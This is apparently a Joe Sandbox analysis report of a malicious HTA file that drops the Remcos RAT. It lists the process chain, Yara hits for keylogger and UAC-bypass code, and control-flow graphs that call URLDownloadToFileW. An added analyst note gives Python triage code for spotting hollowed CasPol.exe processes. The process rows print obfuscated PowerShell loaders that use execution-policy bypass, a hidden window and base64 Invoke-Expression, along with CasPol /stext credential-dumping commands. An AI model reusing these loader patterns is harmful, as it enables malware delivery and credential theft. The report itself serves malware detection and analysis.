                                                                                                                2024-12-16 06:12:32 UTC1369INData Raw: 4a 44 7a 77 77 30 4c 4d 34 43 6a 73 77 77 4b 4d 6d 43 54 6f 77 73 4a 4d 56 43 7a 6a 77 6f 49 4d 45 43 6a 66 77 67 48 4d 7a 42 54 62 77 63 47 4d 68 42 44 58 77 59 46 4d 51 42 6a 53 77 55 45 4d 2f 41 54 4f 77 4d 44 4d 75 41 44 4b 77 49 43 4d 63 41 7a 46 77 45 42 4d 4c 41 54 42 77 41 41 41 41 41 41 33 41 4d 41 55 41 38 6a 2b 2f 51 2f 50 75 2f 54 36 2f 4d 2b 50 64 2f 7a 31 2f 49 39 50 4d 2f 6a 78 2f 41 38 50 37 2b 54 74 2f 38 36 50 70 2b 44 70 2f 34 35 50 59 2b 6a 6b 2f 30 34 50 48 2b 54 67 2f 73 33 50 32 39 44 63 2f 6f 32 50 6b 39 7a 58 2f 6b 31 50 54 39 54 54 2f 67 30 50 43 39 44 50 2f 59 7a 50 78 38 7a 4b 2f 55 79 50 66 38 6a 47 2f 51 78 50 4f 38 44 43 2f 4d 67 50 39 37 7a 39 2b 45 76 50 73 37 6a 35 2b 41 75 50 61 37 54 31 2b 38 73 50 4a 37 7a 77 2b 34 72
                                                                                                                Data Ascii: JDzww0LM4CjswwKMmCTowsJMVCzjwoIMECjfwgHMzBTbwcGMhBDXwYFMQBjSwUEM/ATOwMDMuADKwICMcAzFwEBMLATBwAAAAAA3AMAUA8j+/Q/Pu/T6/M+Pd/z1/I9PM/jx/A8P7+Tt/86Pp+Dp/45PY+jk/04PH+Tg/s3P29Dc/o2Pk9zX/k1PT9TT/g0PC9DP/YzPx8zK/UyPf8jG/QxPO8DC/MgP97z9+EvPs7j5+AuPa7T1+8sPJ7zw+4r



                                                                                                                Target ID:0
                                                                                                                Start time:01:11:58
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:mshta.exe "C:\Users\user\Desktop\clearentirethingwithbestnoticetheeverythinggooodfrome.hta"
                                                                                                                Imagebase:0x6f0000
                                                                                                                File size:13'312 bytes
                                                                                                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:01:11:59
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:01:11:59
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:01:11:59
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))"
                                                                                                                Imagebase:0xcb0000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:4
                                                                                                                Start time:01:12:01
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline"
                                                                                                                Imagebase:0x890000
                                                                                                                File size:2'141'552 bytes
                                                                                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:5
                                                                                                                Start time:01:12:01
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38A1.tmp" "c:\Users\user\AppData\Local\Temp\r1df4acf\CSC5F9E68122E144DC389875BBF6681BEA.TMP"
                                                                                                                Imagebase:0x420000
                                                                                                                File size:46'832 bytes
                                                                                                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:6
                                                                                                                Start time:01:12:07
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"
                                                                                                                Imagebase:0xa90000
                                                                                                                File size:147'456 bytes
                                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:01:12:07
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = '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';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
                                                                                                                Imagebase:0xcb0000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:8
                                                                                                                Start time:01:12:07
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:12
                                                                                                                Start time:01:12:32
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                Imagebase:0x9c0000
                                                                                                                File size:108'664 bytes
                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:false

                                                                                                                Target ID:13
                                                                                                                Start time:01:12:38
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\foowuyqkwn"
                                                                                                                Imagebase:0xf50000
                                                                                                                File size:108'664 bytes
                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:14
                                                                                                                Start time:01:12:38
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qiupnqamsvkxb"
                                                                                                                Imagebase:0x540000
                                                                                                                File size:108'664 bytes
                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:15
                                                                                                                Start time:01:12:38
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\skzzoilfgdcclexm"
                                                                                                                Imagebase:0xf60000
                                                                                                                File size:108'664 bytes
                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true
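Analyst note on Targets 12 to 15, added here and not part of the sandbox output. The four CasPol.exe entries share one binary (MD5 914F728C04D3EDDD5FBA59420E74E56B) but play two roles. Target 12 is launched with no arguments, runs with administrator privileges and never exits, and its memory is where the Remcos and CMSTP UAC-bypass Yara rules fire; Targets 13 to 15 start six seconds later, each with /stext "<random name under %LOCALAPPDATA%\Temp>", and exit. /stext is not an option the .NET Code Access Security Policy tool documents; it is the save-to-text switch of the NirSoft password-recovery utilities that Remcos is known to run inside hollowed copies of its host process, so the three short-lived children are most plausibly credential-harvesting runs (the report does not show the output files, so that is an inference, not a finding). Note also that Target 12's Imagebase is 0x9c0000 while its Yara hits are sourced from a region at 0x400000 with protection 0x40 (PAGE_EXECUTE_READWRITE) and from a writable region at 0xF38000: the matched code is an injected image, not the CasPol binary itself. The Python below is an added example (not Joe Sandbox code) that encodes both observations as checks: a decoder for the .sdmp source names that surfaces private RWX regions, and a triage over process-creation records shaped like the rows above. Assumed rather than taken from the page: the .sdmp field layout (inferred from the fact that 0xC maps to Target ID 12 and 0x40/0x04 match the Windows page-protection constants), the 10-second burst window, and the benign "Target 99" record used as a negative control.

```python
"""Added triage helpers for the CasPol.exe rows and memory-dump names in this report. Sample
data is constructed from the Target 12-15 rows; the .sdmp field layout is inferred, not documented."""
import re
from dataclasses import dataclass
from datetime import datetime
from functools import partial

# Page-protection and region-type constants from winnt.h.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

@dataclass
class DumpSource:
    pid: int
    stage: int
    address: int
    protect: str
    mem_type: str

def parse_dump_source(name: str) -> DumpSource:
    """Decode e.g. 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp
    as PID (hex), stage, dump id, region base, page protection, -, region type, -.  This layout is
    inferred from the names on this page (0xC is Target ID 12; 0x40 marks the RWX regions)."""
    fields = name.removesuffix(".sdmp").split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump source name: {name}")
    protect = int(fields[4], 16) & 0xFF      # drop PAGE_GUARD / PAGE_NOCACHE modifier bits
    mem_type = int(fields[6], 16)
    return DumpSource(int(fields[0], 16), int(fields[1], 16), int(fields[3], 16),
                      PAGE_PROTECT.get(protect, hex(protect)), MEM_TYPE.get(mem_type, hex(mem_type)))

def injected_regions(sources):
    """Private, writable and executable regions: the image loader never creates these, so a
    Yara hit inside one sits in injected or self-written code rather than in the host image."""
    return [d for d in map(parse_dump_source, sources)
            if d.mem_type == "MEM_PRIVATE" and d.protect == "PAGE_EXECUTE_READWRITE"]

@dataclass
class ProcessEvent:
    target_id: int
    start: datetime
    path: str
    cmdline: str
    has_exited: bool

STEXT_RE = re.compile(r'/stext\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)

def command_args(cmdline: str) -> str:
    """Arguments of a Windows command line with the (quoted or bare) image path removed."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end != -1 else ""
    parts = s.split(None, 1)
    return parts[1].strip() if len(parts) == 2 else ""

def triage_caspol(events, burst_window_s=10):
    """Map Target ID -> reasons for CasPol.exe launches that match the hosting pattern above."""
    caspol = [e for e in events if e.path.lower().endswith("\\caspol.exe")]
    findings = {}
    for e in caspol:
        reasons = []
        m = STEXT_RE.search(e.cmdline)
        if m:
            out_file = m.group(1) or m.group(2)
            reasons.append(f"/stext is not a documented CasPol option; output file {out_file}")
            if "\\appdata\\local\\temp\\" in out_file.lower():
                reasons.append("output file lands in the user's Temp directory")
        if not command_args(e.cmdline) and not e.has_exited:
            reasons.append("no arguments yet still resident (CasPol prints usage and exits)")
        peers = [p for p in caspol if abs((p.start - e.start).total_seconds()) <= burst_window_s]
        if len(peers) >= 3:
            reasons.append(f"{len(peers)} CasPol.exe launches within {burst_window_s} s")
        if reasons:
            findings[e.target_id] = reasons
    return findings

CASPOL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
TEMP = r"C:\Users\user\AppData\Local\Temp"
T = partial(datetime, 2024, 12, 16)
# Constructed from the Target 12-15 rows; Target 99 is an invented benign admin invocation.
SAMPLE_EVENTS = [
    ProcessEvent(12, T(1, 12, 32), CASPOL, f'"{CASPOL}"', False),
    ProcessEvent(13, T(1, 12, 38), CASPOL, f'{CASPOL} /stext "{TEMP}\\foowuyqkwn"', True),
    ProcessEvent(14, T(1, 12, 38), CASPOL, f'{CASPOL} /stext "{TEMP}\\qiupnqamsvkxb"', True),
    ProcessEvent(15, T(1, 12, 38), CASPOL, f'{CASPOL} /stext "{TEMP}\\skzzoilfgdcclexm"', True),
    ProcessEvent(99, T(0, 50, 0), CASPOL, f'"{CASPOL}" -m -listgroups', True),
]
# Target 12's two Yara sources plus the PowerShell region holding the URLDownloadToFileW call site.
DUMP_SOURCES = [
    "0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp",
    "00000003.00000002.1793231489.00000000046B0000.00000040.00000800.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    print(triage_caspol(SAMPLE_EVENTS))
    print([(d.pid, hex(d.address), d.protect) for d in injected_regions(DUMP_SOURCES)])
```

Run against the sample, Targets 12 to 15 are all reported (12 for staying resident without arguments, 13 to 15 for the /stext output under Temp, all four for the burst) while the benign Target 99 is not; the dump decoder flags the 0x400000 region of PID 12 and the 0x46B0000 region of PID 3 (the PowerShell memory whose control-flow graph below calls URLDownloadToFileW) as private RWX, and leaves the PAGE_READWRITE region at 0xF38000 alone. On a real host the same checks apply to Sysmon Event ID 1 or Security 4688 records; the burst window and the Temp-path test are tuning knobs, not part of the report.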

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1690065241.0000000007250000.00000010.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_7250000_mshta.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a68e4b8157c3a9a276147b30d5b043f5d5869b0b793f5480ee33d2531b1fe031
                                                                                                                  • Instruction ID: 2193541a08c8c5af366bdbc12619c0f45209326dd38e0515b2c9c1b3751920de
                                                                                                                  • Opcode Fuzzy Hash: a68e4b8157c3a9a276147b30d5b043f5d5869b0b793f5480ee33d2531b1fe031
                                                                                                                  • Instruction Fuzzy Hash: 5F01FFB5A602069FDB50CEAC8C82BEEB7F9AB89710F190419A614F7681D7B4D9418B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1690088700.0000000006EB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_6eb0000_mshta.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                  • Instruction ID: 906af193c3a70ca30bb1eb3e2413404f0fdf0cf406cdd825e2a21439b9ade37f
                                                                                                                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                  • Instruction Fuzzy Hash:

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:3.8%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:17%
                                                                                                                  Total number of Nodes:47
                                                                                                                  Total number of Limit Nodes:6
                                                                                                                  execution_graph 9124 46b7480 9125 46b74be 9124->9125 9126 46b764b 9125->9126 9132 46b7da8 9125->9132 9136 46b7c45 9125->9136 9144 46b7a18 9125->9144 9153 46b7a08 9125->9153 9127 46b75df 9133 46b7cf9 9132->9133 9133->9132 9162 70745f4 9133->9162 9170 7074610 9133->9170 9139 46b7b9a 9136->9139 9141 46b7c5e 9136->9141 9137 46b7de8 URLDownloadToFileW 9140 46b7ea8 9137->9140 9139->9136 9139->9137 9140->9127 9142 70745f4 3 API calls 9141->9142 9143 7074610 3 API calls 9141->9143 9142->9141 9143->9141 9145 46b7a4c 9144->9145 9146 46b7de8 URLDownloadToFileW 9145->9146 9147 46b7b30 9145->9147 9150 46b7c5e 9145->9150 9149 46b7ea8 9146->9149 9147->9127 9149->9127 9151 70745f4 3 API calls 9150->9151 9152 7074610 3 API calls 9150->9152 9151->9150 9152->9150 9158 46b7a4c 9153->9158 9154 46b7de8 URLDownloadToFileW 9157 46b7ea8 9154->9157 9155 46b7b30 9155->9127 9157->9127 9158->9154 9158->9155 9159 46b7c5e 9158->9159 9160 70745f4 3 API calls 9159->9160 9161 7074610 3 API calls 9159->9161 9160->9159 9161->9159 9164 707460b 9162->9164 9163 7074a93 9163->9133 9164->9163 9166 46b7a08 4 API calls 9164->9166 9167 46b7a18 4 API calls 9164->9167 9169 46b7c45 4 API calls 9164->9169 9178 46b1bf8 9164->9178 9165 7074a34 9165->9133 9166->9165 9167->9165 9169->9165 9171 7074a93 9170->9171 9172 7074641 9170->9172 9171->9133 9172->9171 9174 46b7a08 4 API calls 9172->9174 9175 46b7a18 4 API calls 9172->9175 9176 46b1bf8 URLDownloadToFileW 9172->9176 9177 46b7c45 4 API calls 9172->9177 9173 7074a34 9173->9133 9174->9173 9175->9173 9176->9173 9177->9173 9179 46b7e00 URLDownloadToFileW 9178->9179 9181 46b7ea8 9179->9181 9181->9165

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 167 46b7a18-46b7a4a 168 46b7a4c-46b7a53 167->168 169 46b7a90 167->169 170 46b7a55-46b7a62 168->170 171 46b7a64 168->171 172 46b7a93-46b7acf 169->172 173 46b7a66-46b7a68 170->173 171->173 181 46b7b58-46b7b63 172->181 182 46b7ad5-46b7ade 172->182 175 46b7a6a-46b7a6d 173->175 176 46b7a6f-46b7a71 173->176 180 46b7a8e 175->180 178 46b7a73-46b7a80 176->178 179 46b7a82 176->179 183 46b7a84-46b7a86 178->183 179->183 180->172 184 46b7b72-46b7b94 181->184 185 46b7b65-46b7b68 181->185 182->181 186 46b7ae0-46b7ae6 182->186 183->180 193 46b7b9a-46b7ba3 184->193 194 46b7c5e-46b7cf6 184->194 185->184 188 46b7de8-46b7e52 186->188 189 46b7aec-46b7af9 186->189 205 46b7e5d-46b7e63 188->205 206 46b7e54-46b7e5a 188->206 190 46b7afb-46b7b2e 189->190 191 46b7b4f-46b7b56 189->191 203 46b7b4b 190->203 204 46b7b30-46b7b33 190->204 191->181 191->186 193->188 198 46b7ba9-46b7be7 193->198 232 46b7cf9-46b7d52 194->232 215 46b7be9-46b7bff 198->215 216 46b7c01-46b7c14 198->216 203->191 208 46b7b3f-46b7b48 204->208 209 46b7b35-46b7b38 204->209 210 46b7e71-46b7ea6 URLDownloadToFileW 205->210 211 46b7e65-46b7e6e 205->211 206->205 209->208 213 46b7ea8-46b7eae 210->213 214 46b7eaf-46b7ec3 210->214 211->210 213->214 218 46b7c16-46b7c1d 215->218 216->218 219 46b7c1f-46b7c30 218->219 220 46b7c42-46b7c58 218->220 219->220 226 46b7c32-46b7c3b 219->226 220->193 220->194 226->220 245 46b7d55 call 70745f4 232->245 246 46b7d55 call 7074610 232->246 237 46b7d57-46b7d60 238 46b7d7a-46b7d8d 237->238 239 46b7d62-46b7d78 237->239 240 46b7d8f-46b7d96 238->240 239->240 241 46b7d98-46b7d9e 240->241 242 46b7da5-46b7daf 240->242 241->242 242->232 245->237 246->237
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1793231489.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 17ebb35e1450accd8cf404e0065e4cd4b936716ddc3d88ba642df960c9fd9032
                                                                                                                  • Instruction ID: db3452710bda14d2d328e112b8214dd92297c46f15711347312e1d22909fa7e0
                                                                                                                  • Opcode Fuzzy Hash: 17ebb35e1450accd8cf404e0065e4cd4b936716ddc3d88ba642df960c9fd9032
                                                                                                                  • Instruction Fuzzy Hash: EAE1F475A01219AFDB05CF98D984ADEBBF2FF88311F248159E848AB351D735A981CB90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 7074610-707463b 1 7074af2-7074b10 0->1 2 7074641-7074646 0->2 10 7074b12 1->10 11 7074b1e-7074b25 1->11 3 707465e-7074663 2->3 4 7074648-707464e 2->4 8 7074665-7074671 3->8 9 7074673 3->9 5 7074652-707465c 4->5 6 7074650 4->6 5->3 6->3 12 7074675-7074677 8->12 9->12 14 7074b27-7074b33 11->14 15 7074b35 11->15 16 7074a93-7074a9d 12->16 17 707467d-7074687 12->17 18 7074b37-7074b39 14->18 15->18 20 7074a9f-7074aa8 16->20 21 7074aab-7074ab1 16->21 17->1 19 707468d-7074692 17->19 26 7074b7b-7074b85 18->26 27 7074b3b-7074b42 18->27 24 7074694-707469a 19->24 25 70746aa-70746b8 19->25 22 7074ab7-7074ac3 21->22 23 7074ab3-7074ab5 21->23 28 7074ac5-7074aef 22->28 23->28 29 707469e-70746a8 24->29 30 707469c 24->30 25->16 41 70746be-70746dd 25->41 32 7074b87-7074b8b 26->32 33 7074b8e-7074b94 26->33 27->26 31 7074b44-7074b61 27->31 29->25 30->25 43 7074b63-7074b75 31->43 44 7074bc9-7074bce 31->44 36 7074b96-7074b98 33->36 37 7074b9a-7074ba6 33->37 42 7074ba8-7074bc6 36->42 37->42 41->16 52 70746e3-70746ed 41->52 43->26 44->43 52->1 53 70746f3-70746f8 52->53 54 7074710-7074714 53->54 55 70746fa-7074700 53->55 54->16 58 707471a-707471e 54->58 56 7074704-707470e 55->56 57 7074702 55->57 56->54 57->54 58->16 59 7074724-7074728 58->59 59->16 61 707472e-707473e 59->61 62 70747c6-7074815 61->62 63 7074744-707476b 61->63 80 707481c-707482f 62->80 68 7074785-70747b3 63->68 69 707476d-7074773 63->69 78 70747b5-70747b7 68->78 79 70747c1-70747c4 68->79 71 7074777-7074783 69->71 72 7074775 69->72 71->68 72->68 78->79 79->80 81 70748b7-7074906 80->81 82 7074835-707485c 80->82 99 707490d-7074920 81->99 87 7074876-70748a4 82->87 88 707485e-7074864 82->88 97 70748a6-70748a8 87->97 98 70748b2-70748b5 87->98 90 7074866 88->90 91 7074868-7074874 88->91 90->87 91->87 97->98 98->99 100 7074926-707494d 99->100 101 70749a8-70749f7 99->101 106 7074967-7074995 100->106 107 707494f-7074955 